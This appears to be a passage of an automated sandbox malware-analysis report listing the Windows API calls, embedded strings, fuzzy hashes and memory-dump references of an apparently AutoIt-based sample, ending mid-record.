                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: LogonUser
                                                    • String ID:
                                                    • API String ID: 1244722697-0
                                                    • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                    • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                    • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                    • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                    • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                    • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                    • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                    • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                    • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                    • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N@
                                                    • API String ID: 0-1509896676
                                                    • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                    • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                    • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                    • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                    • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                    • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                    • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                    • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                    • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                    • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                    • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                    • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                    • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                    • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                    • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                    • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                    APIs
                                                    • DeleteObject.GDI32(?), ref: 0045953B
                                                    • DeleteObject.GDI32(?), ref: 00459551
                                                    • DestroyWindow.USER32(?), ref: 00459563
                                                    • GetDesktopWindow.USER32 ref: 00459581
                                                    • GetWindowRect.USER32(00000000), ref: 00459588
                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                    • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                    • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                    • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                    • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                    • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                    • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                    • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                    • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                    • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                    • ShowWindow.USER32(?,00000004), ref: 00459865
                                                    • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                    • GetStockObject.GDI32(00000011), ref: 004598CD
                                                    • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                    • DeleteDC.GDI32(00000000), ref: 004598F8
                                                    • _wcslen.LIBCMT ref: 00459916
                                                    • _wcscpy.LIBCMT ref: 0045993A
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                    • GetDC.USER32(00000000), ref: 004599FC
                                                    • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                    • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                    • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                    • API String ID: 4040870279-2373415609
                                                    • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                    • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                    • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                    • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 0044181E
                                                    • SetTextColor.GDI32(?,?), ref: 00441826
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                    • GetSysColor.USER32(0000000F), ref: 00441849
                                                    • SetBkColor.GDI32(?,?), ref: 00441864
                                                    • SelectObject.GDI32(?,?), ref: 00441874
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                    • GetSysColor.USER32(00000010), ref: 004418B2
                                                    • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                    • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                    • DeleteObject.GDI32(?), ref: 004418D5
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                    • FillRect.USER32(?,?,?), ref: 00441970
                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                      • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                      • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                      • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                      • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                      • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                      • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                      • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                      • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                      • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                    • String ID:
                                                    • API String ID: 69173610-0
                                                    • Opcode ID: aabc284dba47c1a3a6dec5b78ffd15edee2a2e62f1ca49aa5b34823cb23ab055
                                                    • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                    • Opcode Fuzzy Hash: aabc284dba47c1a3a6dec5b78ffd15edee2a2e62f1ca49aa5b34823cb23ab055
                                                    • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                    APIs
                                                    • DestroyWindow.USER32(?), ref: 004590F2
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                    • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                    • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                    • GetStockObject.GDI32(00000011), ref: 004592AC
                                                    • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                    • DeleteDC.GDI32(00000000), ref: 004592D6
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                    • GetStockObject.GDI32(00000011), ref: 004593D3
                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                    • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                    • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                    • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 1038674560-3360698832
                                                    • Opcode ID: 65fc6129c27a0e5b9038aaf471882948dbc31deeea1a7772db1e4d1b886b8c94
                                                    • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                    • Opcode Fuzzy Hash: 65fc6129c27a0e5b9038aaf471882948dbc31deeea1a7772db1e4d1b886b8c94
                                                    • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                    • SetCursor.USER32(00000000), ref: 0043075B
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                    • SetCursor.USER32(00000000), ref: 00430773
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                    • SetCursor.USER32(00000000), ref: 0043078B
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                    • SetCursor.USER32(00000000), ref: 004307A3
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                    • SetCursor.USER32(00000000), ref: 004307BB
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                    • SetCursor.USER32(00000000), ref: 004307D3
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                    • SetCursor.USER32(00000000), ref: 004307EB
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                    • SetCursor.USER32(00000000), ref: 00430803
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                    • SetCursor.USER32(00000000), ref: 0043081B
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                    • SetCursor.USER32(00000000), ref: 00430833
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                    • SetCursor.USER32(00000000), ref: 0043084B
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                    • SetCursor.USER32(00000000), ref: 00430863
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                    • SetCursor.USER32(00000000), ref: 0043087B
                                                    • SetCursor.USER32(00000000), ref: 00430887
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                    • SetCursor.USER32(00000000), ref: 0043089F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load
                                                    • String ID:
